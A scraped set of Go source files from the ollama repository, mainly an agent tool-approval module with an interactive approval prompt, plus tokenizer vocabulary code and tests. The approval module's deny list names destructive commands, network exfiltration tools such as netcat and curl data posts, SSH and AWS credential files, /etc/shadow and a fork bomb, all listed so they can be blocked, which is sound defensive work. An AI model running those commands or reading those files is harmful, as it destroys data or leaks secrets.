t.Run(tt.name, func(t *testing.T) { result := isCommandOutsideCwd(tt.command) if result != tt.expected { t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v", tt.command, result, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_unix.go
x/agent/approval_unix.go
//go:build !windows package agent import ( "syscall" "time" ) // flushStdin drains any buffered input from stdin. // This prevents leftover input from previous operations from affecting the selector. func flushStdin(fd int) { if err := syscall.SetNonblock(fd, true); err != nil { return } defer syscall.SetNonblock(fd, false) time.Sleep(5 * time.Millisecond) buf := make([]byte, 256) for { n, err := syscall.Read(fd, buf) if n <= 0 || err != nil { break } } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval.go
x/agent/approval.go
// Package agent provides agent loop orchestration and tool approval. package agent import ( "fmt" "os" "path/filepath" "strings" "sync" "golang.org/x/term" ) // ApprovalDecision represents the user's decision for a tool execution. type ApprovalDecision int const ( // ApprovalDeny means the user denied execution. ApprovalDeny ApprovalDecision = iota // ApprovalOnce means execute this one time only. ApprovalOnce // ApprovalAlways means add to session allowlist. ApprovalAlways ) // ApprovalResult contains the decision and optional deny reason. type ApprovalResult struct { Decision ApprovalDecision DenyReason string } // Option labels for the selector (numbered for quick selection) var optionLabels = []string{ "1. Execute once", "2. Always allow", "3. Deny", } // autoAllowCommands are commands that are always allowed without prompting. // These are zero-risk, read-only commands. var autoAllowCommands = map[string]bool{ "pwd": true, "echo": true, "date": true, "whoami": true, "hostname": true, "uname": true, } // autoAllowPrefixes are command prefixes that are always allowed. // These are read-only or commonly-needed development commands. var autoAllowPrefixes = []string{ // Git read-only "git status", "git log", "git diff", "git branch", "git show", "git remote -v", "git tag", "git stash list", // Package managers - run scripts "npm run", "npm test", "npm start", "bun run", "bun test", "uv run", "yarn run", "yarn test", "pnpm run", "pnpm test", // Package info "go list", "go version", "go env", "npm list", "npm ls", "npm version", "pip list", "pip show", "cargo tree", "cargo version", // Build commands "go build", "go test", "go fmt", "go vet", "make", "cmake", "cargo build", "cargo test", "cargo check", } // denyPatterns are dangerous command patterns that are always blocked. var denyPatterns = []string{ // Destructive commands "rm -rf", "rm -fr", "mkfs", "dd if=", "dd of=", "shred", "> /dev/", ">/dev/", // Privilege escalation "sudo ", "su ", "doas ", "chmod 777", "chmod -R 777", "chown ", "chgrp ", // Network exfiltration "curl -d", "curl --data", "curl -X POST", "curl -X PUT", "wget --post", "nc ", "netcat ", "scp ", "rsync ", // History and credentials "history", ".bash_history", ".zsh_history", ".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519", ".ssh/config", ".aws/credentials", ".aws/config", ".gnupg/", "/etc/shadow", "/etc/passwd", // Dangerous patterns ":(){ :|:& };:", // fork bomb "chmod +s", // setuid "mkfifo", } // denyPathPatterns are file patterns that should never be accessed. // These are checked as exact filename matches or path suffixes. var denyPathPatterns = []string{ ".env", ".env.local", ".env.production", "credentials.json", "secrets.json", "secrets.yaml", "secrets.yml", ".pem", ".key", } // ApprovalManager manages tool execution approvals. type ApprovalManager struct { allowlist map[string]bool // exact matches prefixes map[string]bool // prefix matches for bash commands (e.g., "cat:tools/") mu sync.RWMutex } // NewApprovalManager creates a new approval manager. func NewApprovalManager() *ApprovalManager { return &ApprovalManager{ allowlist: make(map[string]bool), prefixes: make(map[string]bool), } } // IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed). func IsAutoAllowed(command string) bool { command = strings.TrimSpace(command) // Check exact command match (first word) fields := strings.Fields(command) if len(fields) > 0 && autoAllowCommands[fields[0]] { return true } // Check prefix match for _, prefix := range autoAllowPrefixes { if strings.HasPrefix(command, prefix) { return true } } return false } // IsDenied checks if a bash command matches deny patterns. // Returns true and the matched pattern if denied. func IsDenied(command string) (bool, string) { commandLower := strings.ToLower(command) // Check deny patterns for _, pattern := range denyPatterns { if strings.Contains(commandLower, strings.ToLower(pattern)) { return true, pattern } } // Check deny path patterns for _, pattern := range denyPathPatterns { if strings.Contains(commandLower, strings.ToLower(pattern)) { return true, pattern } } return false, "" } // FormatDeniedResult returns the tool result message when a command is blocked. func FormatDeniedResult(command string, pattern string) string { return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern) } // extractBashPrefix extracts a prefix pattern from a bash command. // For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/" // For commands without path args, returns empty string. func extractBashPrefix(command string) string { // Split command by pipes and get the first part parts := strings.Split(command, "|") firstCmd := strings.TrimSpace(parts[0]) // Split into command and args fields := strings.Fields(firstCmd) if len(fields) < 2 { return "" } baseCmd := fields[0] // Common commands that benefit from prefix allowlisting // These are typically safe for read operations on specific directories safeCommands := map[string]bool{ "cat": true, "ls": true, "head": true, "tail": true, "less": true, "more": true, "file": true, "wc": true, "grep": true, "find": true, "tree": true, "stat": true, "sed": true, } if !safeCommands[baseCmd] { return "" } // Find the first path-like argument (must contain / or start with .) // First pass: look for clear paths (containing / or starting with .) for _, arg := range fields[1:] { // Skip flags if strings.HasPrefix(arg, "-") { continue } // Skip numeric arguments (e.g., "head -n 100") if isNumeric(arg) { continue } // Only process if it looks like a path (contains / or starts with .) if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") { continue } // If arg ends with /, it's a directory - use it directly if strings.HasSuffix(arg, "/") { return fmt.Sprintf("%s:%s", baseCmd, arg) } // Get the directory part of a file path dir := filepath.Dir(arg) if dir == "." { // Path is just a directory like "tools" or "src" (no trailing /) return fmt.Sprintf("%s:%s/", baseCmd, arg) } return fmt.Sprintf("%s:%s/", baseCmd, dir) } // Second pass: if no clear path found, use the first non-flag argument as a filename for _, arg := range fields[1:] { if strings.HasPrefix(arg, "-") { continue } if isNumeric(arg) { continue } // Treat as filename in current dir return fmt.Sprintf("%s:./", baseCmd) } return "" } // isNumeric checks if a string is a numeric value func isNumeric(s string) bool { for _, c := range s { if c < '0' || c > '9' { return false } } return len(s) > 0 } // isCommandOutsideCwd checks if a bash command targets paths outside the current working directory. // Returns true if any path argument would access files outside cwd. func isCommandOutsideCwd(command string) bool { cwd, err := os.Getwd() if err != nil { return false // Can't determine, assume safe } // Split command by pipes and semicolons to check all parts parts := strings.FieldsFunc(command, func(r rune) bool { return r == '|' || r == ';' || r == '&' }) for _, part := range parts { part = strings.TrimSpace(part) fields := strings.Fields(part) if len(fields) == 0 { continue } // Check each argument that looks like a path for _, arg := range fields[1:] { // Skip flags if strings.HasPrefix(arg, "-") { continue } // Treat POSIX-style absolute paths as outside cwd on all platforms. if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") { return true } // Check for absolute paths outside cwd if filepath.IsAbs(arg) { absPath := filepath.Clean(arg) if !strings.HasPrefix(absPath, cwd) { return true } continue } // Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd) if strings.HasPrefix(arg, "..") { // Resolve the path relative to cwd absPath := filepath.Join(cwd, arg) absPath = filepath.Clean(absPath) if !strings.HasPrefix(absPath, cwd) { return true } } // Check for home directory expansion if strings.HasPrefix(arg, "~") { home, err := os.UserHomeDir() if err == nil && !strings.HasPrefix(home, cwd) { return true } } } } return false } // AllowlistKey generates the key for exact allowlist lookup. func AllowlistKey(toolName string, args map[string]any) string { if toolName == "bash" { if cmd, ok := args["command"].(string); ok { return fmt.Sprintf("bash:%s", cmd) } } return toolName } // IsAllowed checks if a tool/command is allowed (exact match or prefix match). func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool { a.mu.RLock() defer a.mu.RUnlock() // Check exact match first key := AllowlistKey(toolName, args) if a.allowlist[key] { return true } // For bash commands, check prefix matches if toolName == "bash" { if cmd, ok := args["command"].(string); ok { prefix := extractBashPrefix(cmd) if prefix != "" && a.prefixes[prefix] { return true } } } // Check if tool itself is allowed (non-bash) if toolName != "bash" && a.allowlist[toolName] { return true } return false } // AddToAllowlist adds a tool/command to the session allowlist. // For bash commands, it adds the prefix pattern instead of exact command. func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) { a.mu.Lock() defer a.mu.Unlock() if toolName == "bash" { if cmd, ok := args["command"].(string); ok { prefix := extractBashPrefix(cmd) if prefix != "" { a.prefixes[prefix] = true return } // Fall back to exact match if no prefix extracted a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true return } } a.allowlist[toolName] = true } // RequestApproval prompts the user for approval to execute a tool. // Returns the decision and optional deny reason. func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) { // Format tool info for display toolDisplay := formatToolDisplay(toolName, args) // Enter raw mode for interactive selection fd := int(os.Stdin.Fd()) oldState, err := term.MakeRaw(fd) if err != nil { // Fallback to simple input if terminal control fails return a.fallbackApproval(toolDisplay) } // Flush any pending stdin input before starting selector // This prevents buffered input from causing double-press issues flushStdin(fd) // Check if bash command targets paths outside cwd isWarning := false if toolName == "bash" { if cmd, ok := args["command"].(string); ok { isWarning = isCommandOutsideCwd(cmd) } } // Run interactive selector selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning) if err != nil { term.Restore(fd, oldState) return ApprovalResult{Decision: ApprovalDeny}, err } // Restore terminal term.Restore(fd, oldState) // Map selection to decision switch selected { case -1: // Ctrl+C cancelled return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil case 0: return ApprovalResult{Decision: ApprovalOnce}, nil case 1: return ApprovalResult{Decision: ApprovalAlways}, nil default: return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil } } // formatToolDisplay creates the display string for a tool call. func formatToolDisplay(toolName string, args map[string]any) string { var sb strings.Builder // For bash, show command directly if toolName == "bash" { if cmd, ok := args["command"].(string); ok { sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName)) sb.WriteString(fmt.Sprintf("Command: %s", cmd)) return sb.String() } } // For web search, show query if toolName == "web_search" { if query, ok := args["query"].(string); ok { sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName)) sb.WriteString(fmt.Sprintf("Query: %s", query)) return sb.String() } } // Generic display sb.WriteString(fmt.Sprintf("Tool: %s", toolName)) if len(args) > 0 { sb.WriteString("\nArguments: ") first := true for k, v := range args { if !first { sb.WriteString(", ") } sb.WriteString(fmt.Sprintf("%s=%v", k, v)) first = false } } return sb.String() } // selectorState holds the state for the interactive selector type selectorState struct { toolDisplay string selected int totalLines int termWidth int termHeight int boxWidth int innerWidth int denyReason string // deny reason (always visible in box) isWarning bool // true if command targets paths outside cwd (red box) } // runSelector runs the interactive selector and returns the selected index and optional deny reason. // If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd. func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) { state := &selectorState{ toolDisplay: toolDisplay, selected: 0, isWarning: isWarning, } // Get terminal size state.termWidth, state.termHeight, _ = term.GetSize(fd) if state.termWidth < 20 { state.termWidth = 80 // fallback } // Calculate box width: 90% of terminal, min 24, max 60 state.boxWidth = (state.termWidth * 90) / 100 if state.boxWidth > 60 { state.boxWidth = 60 } if state.boxWidth < 24 { state.boxWidth = 24 } // Ensure box fits in terminal if state.boxWidth > state.termWidth-1 { state.boxWidth = state.termWidth - 1 } state.innerWidth = state.boxWidth - 4 // account for "│ " and " │" // Calculate total lines (will be updated by render) state.totalLines = calculateTotalLines(state) // Hide cursor during selection (show when in deny mode) fmt.Fprint(os.Stderr, "\033[?25l") defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done // Initial render renderSelectorBox(state) numOptions := len(optionLabels) for { // Read input buf := make([]byte, 8) n, err := os.Stdin.Read(buf) if err != nil { clearSelectorBox(state) return 2, "", err } // Process input byte by byte for i := 0; i < n; i++ { ch := buf[i] // Check for escape sequences (arrow keys) if ch == 27 && i+2 < n && buf[i+1] == '[' { oldSelected := state.selected switch buf[i+2] { case 'A': // Up arrow if state.selected > 0 { state.selected-- } case 'B': // Down arrow if state.selected < numOptions-1 { state.selected++ } } if oldSelected != state.selected { updateSelectorOptions(state) } i += 2 // Skip the rest of escape sequence continue } switch { // Ctrl+C - cancel case ch == 3: clearSelectorBox(state) return -1, "", nil // -1 indicates cancelled // Enter key - confirm selection case ch == 13: clearSelectorBox(state) if state.selected == 2 { // Deny return 2, state.denyReason, nil } return state.selected, "", nil // Number keys 1-3 for quick select case ch >= '1' && ch <= '3': selected := int(ch - '1') clearSelectorBox(state) if selected == 2 { // Deny return 2, state.denyReason, nil } return selected, "", nil // Backspace - delete from reason (UTF-8 safe) case ch == 127 || ch == 8: if len(state.denyReason) > 0 { runes := []rune(state.denyReason) state.denyReason = string(runes[:len(runes)-1]) updateReasonInput(state) } // Escape - clear reason case ch == 27: if len(state.denyReason) > 0 { state.denyReason = "" updateReasonInput(state) } // Printable ASCII (except 1-3 handled above) - type into reason case ch >= 32 && ch < 127: maxLen := state.innerWidth - 2 if maxLen < 10 { maxLen = 10 } if len(state.denyReason) < maxLen { state.denyReason += string(ch) // Auto-select Deny option when user starts typing if state.selected != 2 { state.selected = 2 updateSelectorOptions(state) } else { updateReasonInput(state) } } } } } } // wrapText wraps text to fit within maxWidth, returning lines func wrapText(text string, maxWidth int) []string { if maxWidth < 5 { maxWidth = 5 } var lines []string for _, line := range strings.Split(text, "\n") { if len(line) <= maxWidth { lines = append(lines, line) continue } // Wrap long lines for len(line) > maxWidth { // Try to break at space breakAt := maxWidth for i := maxWidth; i > maxWidth/2; i-- { if i < len(line) && line[i] == ' ' { breakAt = i break } } lines = append(lines, line[:breakAt]) line = strings.TrimLeft(line[breakAt:], " ") } if len(line) > 0 { lines = append(lines, line) } } return lines } // getHintLines returns the hint text wrapped to terminal width func getHintLines(state *selectorState) []string { hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel" if state.termWidth >= len(hint)+1 { return []string{hint} } // Wrap hint to multiple lines return wrapText(hint, state.termWidth-1) } // calculateTotalLines calculates how many lines the selector will use func calculateTotalLines(state *selectorState) int { toolLines := wrapText(state.toolDisplay, state.innerWidth) hintLines := getHintLines(state) // top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines warningLines := 0 if state.isWarning { warningLines = 1 } return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines) } // renderSelectorBox renders the complete selector box func renderSelectorBox(state *selectorState) { toolLines := wrapText(state.toolDisplay, state.innerWidth) hintLines := getHintLines(state) // Use red for warning (outside cwd), cyan for normal boxColor := "\033[36m" // cyan if state.isWarning { boxColor = "\033[91m" // bright red } // Draw box top fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2)) // Draw warning line if needed (inside the box) if state.isWarning { warning := "!! OUTSIDE PROJECT !!" padding := (state.innerWidth - len(warning)) / 2 if padding < 0 { padding = 0 } fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor, strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor) } // Draw tool info for _, line := range toolLines { fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor) } // Draw separator fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2)) // Draw options with numbers (Deny option includes reason input) for i, label := range optionLabels { if i == 2 { // Deny option - show with reason input beside it denyLabel := "3. Deny: " availableWidth := state.innerWidth - 2 - len(denyLabel) if availableWidth < 5 { availableWidth = 5 } inputDisplay := state.denyReason if len(inputDisplay) > availableWidth { inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:] } if i == state.selected { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } else { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } } else { displayLabel := label if len(displayLabel) > state.innerWidth-2 { displayLabel = displayLabel[:state.innerWidth-5] + "..." } if i == state.selected { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor) } else { fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor) } } } // Draw box bottom fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2)) // Draw hint (may be multiple lines) for i, line := range hintLines { if i == len(hintLines)-1 { // Last line - no newline fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line) } else { fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line) } } } // updateSelectorOptions updates just the options portion of the selector func updateSelectorOptions(state *selectorState) { hintLines := getHintLines(state) // Use red for warning (outside cwd), cyan for normal boxColor := "\033[36m" // cyan if state.isWarning { boxColor = "\033[91m" // bright red } // Move up to the first option line // Cursor is at end of last hint line, need to go up: // (hint lines - 1) + 1 (bottom border) + numOptions linesToMove := len(hintLines) - 1 + 1 + len(optionLabels) fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove) // Redraw options (Deny option includes reason input) for i, label := range optionLabels { if i == 2 { // Deny option denyLabel := "3. Deny: " availableWidth := state.innerWidth - 2 - len(denyLabel) if availableWidth < 5 { availableWidth = 5 } inputDisplay := state.denyReason if len(inputDisplay) > availableWidth { inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:] } if i == state.selected { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } else { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } } else { displayLabel := label if len(displayLabel) > state.innerWidth-2 { displayLabel = displayLabel[:state.innerWidth-5] + "..." } if i == state.selected { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor) } else { fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor) } } } // Redraw bottom and hint fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2)) for i, line := range hintLines { if i == len(hintLines)-1 { fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line) } else { fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line) } } } // updateReasonInput updates just the Deny option line (which contains the reason input) func updateReasonInput(state *selectorState) { hintLines := getHintLines(state) // Use red for warning (outside cwd), cyan for normal boxColor := "\033[36m" // cyan if state.isWarning { boxColor = "\033[91m" // bright red } // Move up to the Deny line (3rd option, index 2) // Cursor is at end of last hint line, need to go up: // (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option) linesToMove := len(hintLines) - 1 + 1 + 1 fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove) // Redraw Deny line with reason denyLabel := "3. Deny: " availableWidth := state.innerWidth - 2 - len(denyLabel) if availableWidth < 5 { availableWidth = 5 } inputDisplay := state.denyReason if len(inputDisplay) > availableWidth { inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:] } if state.selected == 2 { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } else { fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor) } // Redraw bottom and hint fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2)) for i, line := range hintLines { if i == len(hintLines)-1 { fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line) } else { fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line) } } } // clearSelectorBox clears the selector from screen func clearSelectorBox(state *selectorState) { // Clear the current line (hint line) first fmt.Fprint(os.Stderr, "\r\033[K") // Move up and clear each remaining line for range state.totalLines - 1 { fmt.Fprint(os.Stderr, "\033[A\033[K") } fmt.Fprint(os.Stderr, "\r") } // fallbackApproval handles approval when terminal control isn't available. func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) { fmt.Fprintln(os.Stderr) fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━") fmt.Fprintln(os.Stderr, toolDisplay) fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━") fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny") fmt.Fprint(os.Stderr, "Choice: ") var input string fmt.Scanln(&input) switch input { case "1": return ApprovalResult{Decision: ApprovalOnce}, nil case "2": return ApprovalResult{Decision: ApprovalAlways}, nil default: fmt.Fprint(os.Stderr, "Reason (optional): ") var reason string fmt.Scanln(&reason) return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil } } // Reset clears the session allowlist. func (a *ApprovalManager) Reset() { a.mu.Lock() defer a.mu.Unlock() a.allowlist = make(map[string]bool) a.prefixes = make(map[string]bool) } // AllowedTools returns a list of tools and prefixes in the allowlist. func (a *ApprovalManager) AllowedTools() []string { a.mu.RLock() defer a.mu.RUnlock() tools := make([]string, 0, len(a.allowlist)+len(a.prefixes)) for tool := range a.allowlist { tools = append(tools, tool) } for prefix := range a.prefixes { tools = append(tools, prefix+"*") } return tools } // FormatApprovalResult returns a formatted string showing the approval result. func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string { var status string var icon string switch result.Decision { case ApprovalOnce: status = "Approved" icon = "\033[32m✓\033[0m" case ApprovalAlways: status = "Always allowed" icon = "\033[32m✓\033[0m" case ApprovalDeny: status = "Denied" icon = "\033[31m✗\033[0m" } // Format based on tool type if toolName == "bash" { if cmd, ok := args["command"].(string); ok { // Truncate long commands if len(cmd) > 40 { cmd = cmd[:37] + "..." } return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon) } } if toolName == "web_search" { if query, ok := args["query"].(string); ok { // Truncate long queries if len(query) > 40 { query = query[:37] + "..." } return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon) } } return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon) } // FormatDenyResult returns the tool result message when a tool is denied. func FormatDenyResult(toolName string, reason string) string { if reason != "" { return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason) } return fmt.Sprintf("User denied execution of %s.", toolName) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_windows.go
x/agent/approval_windows.go
//go:build windows package agent import ( "os" "golang.org/x/sys/windows" ) // flushStdin clears any buffered console input on Windows. func flushStdin(_ int) { handle := windows.Handle(os.Stdin.Fd()) _ = windows.FlushConsoleInputBuffer(handle) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/vocabulary.go
model/vocabulary.go
package model import ( "log/slog" "slices" "sync" ) type Special int32 const ( SpecialBOS Special = iota SpecialEOS ) type Vocabulary struct { Values []string Types []int32 Scores []float32 Merges []string BOS, EOS []int32 AddBOS, AddEOS bool specialOnce sync.Once special []string valuesOnce sync.Once values map[string]int32 mergeOnce sync.Once merge map[string]int32 } func (v *Vocabulary) Is(id int32, special Special) bool { switch special { case SpecialBOS: return slices.Contains(v.BOS, id) case SpecialEOS: return slices.Contains(v.EOS, id) default: return false } } func (v *Vocabulary) addSpecials(ids []int32) []int32 { if v.AddBOS && len(v.BOS) > 0 { if len(ids) > 0 && slices.Contains(v.BOS, ids[0]) { slog.Warn("adding bos token to prompt which already has it", "id", v.BOS) } slog.Debug("adding bos token to prompt", "id", v.BOS[0]) ids = append([]int32{v.BOS[0]}, ids...) } if v.AddEOS && len(v.EOS) > 0 { if len(ids) > 0 && slices.Contains(v.BOS, ids[len(ids)-1]) { slog.Warn("adding eos token to prompt which already has it", "id", v.EOS) } slog.Debug("adding eos token to prompt", "id", v.EOS[0]) ids = append(ids, v.EOS[0]) } return ids } func (v *Vocabulary) Encode(s string) int32 { v.valuesOnce.Do(func() { v.values = make(map[string]int32, len(v.Values)) for i, value := range v.Values { v.values[value] = int32(i) } }) if id, ok := v.values[s]; ok { return id } return -1 } func (v *Vocabulary) Decode(id int32) string { return v.Values[id] } func (v *Vocabulary) SpecialVocabulary() []string { v.specialOnce.Do(func() { for i := range v.Values { if v.Types[i] == TOKEN_TYPE_CONTROL || v.Types[i] == TOKEN_TYPE_USER_DEFINED { v.special = append(v.special, v.Values[i]) } } }) return v.special } func (v *Vocabulary) Merge(left, right string) int { v.mergeOnce.Do(func() { v.merge = make(map[string]int32, len(v.Merges)) for i, merge := range v.Merges { v.merge[merge] = int32(i) } }) if id, ok := v.merge[left+" "+right]; ok { return int(id) } return -1 }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/sentencepiece_test.go
model/sentencepiece_test.go
package model import ( "log/slog" "os" "path/filepath" "slices" "testing" "google.golang.org/protobuf/proto" "github.com/ollama/ollama/convert/sentencepiece" ) func loadSentencePieceVocab(t *testing.T) SentencePiece { t.Helper() bts, err := os.ReadFile(filepath.Join("testdata", "gemma2", "tokenizer.model")) if err != nil { t.Fatal(err) } var spm sentencepiece.ModelProto if err := proto.Unmarshal(bts, &spm); err != nil { t.Fatal(err) } var v Vocabulary for _, piece := range spm.GetPieces() { v.Values = append(v.Values, piece.GetPiece()) v.Scores = append(v.Scores, piece.GetScore()) switch t := piece.GetType(); t { case sentencepiece.ModelProto_SentencePiece_UNKNOWN, sentencepiece.ModelProto_SentencePiece_CONTROL, sentencepiece.ModelProto_SentencePiece_UNUSED, sentencepiece.ModelProto_SentencePiece_BYTE: v.Types = append(v.Types, int32(t)) default: tt := int32(sentencepiece.ModelProto_SentencePiece_NORMAL) // todo parse the special tokens file // - this will roundtrip correctly but the <start_of_turn> and // <end_of_turn> tokens aren't processed v.Types = append(v.Types, tt) } } return NewSentencePiece(&v) } func TestSentencePieceEncode(t *testing.T) { logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug})) slog.SetDefault(logger) tokenizer := loadSentencePieceVocab(t) t.Run("basic roundtrip", func(t *testing.T) { t.Parallel() cases := []string{ "hello", "hello ", "hello ", " hello", " hello ", " hello ", "hello world", "请考试我的软件!12345", "你好", "Hello 你好 world!", "Special characters: !@#$%^&*()_+-=[]{}|;':\",./<>?", "Multilingual: 你好 こんにちは Привет Hola مرحبا", "Numbers and symbols: 123456789 +- */", "Special tokens: <bos> text <eos>", "Code snippets: func main() { fmt.Println(\"Hello World\") }", "Long text: " + "Lorem ipsum dolor sit amet, consectetur adipiscing elit. " + "Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. " + "Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris.", } for _, want := range cases { ids, err := tokenizer.Encode(want, true) if err != nil { t.Fatal(err) } if got, err := tokenizer.Decode(ids); err != nil { t.Fatal(err) } else if got != want { t.Errorf("got %q, want %q [%#v]", got, want, ids) } } }) t.Run("special tokens", func(t *testing.T) { type candidate struct { token string ids []int32 } cases := []candidate{ {"<bos>", []int32{2}}, {"<eos>", []int32{1}}, } for _, want := range cases { ids, err := tokenizer.Encode(want.token, true) if err != nil { t.Fatal(err) } if !slices.Equal(ids, want.ids) { t.Errorf("got %#v, want %#v", ids, want.ids) } } }) } func TestSentencePieceDecodeByteTokens(t *testing.T) { vocab := &Vocabulary{ Values: []string{ "normal", "<0xEA>", "<0x41>", "<0xC3>", "<0xA3>", }, Types: []int32{ TOKEN_TYPE_NORMAL, TOKEN_TYPE_BYTE, TOKEN_TYPE_BYTE, TOKEN_TYPE_BYTE, TOKEN_TYPE_BYTE, }, Scores: []float32{0, 0, 0, 0, 0}, } spm := NewSentencePiece(vocab) tests := []struct { name string ids []int32 expected string }{ { name: "single byte token", ids: []int32{1}, expected: "\xea", }, { name: "ASCII byte token", ids: []int32{2}, expected: "A", }, { name: "multiple byte tokens forming UTF-8 character", ids: []int32{3, 4}, expected: "ã", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result, err := spm.Decode(tt.ids) if err != nil { t.Errorf("failed to decode token IDs %v: %v", tt.ids, err) } if result != tt.expected { t.Errorf("got %q, want %q", result, tt.expected) } }) } }
go
MIT
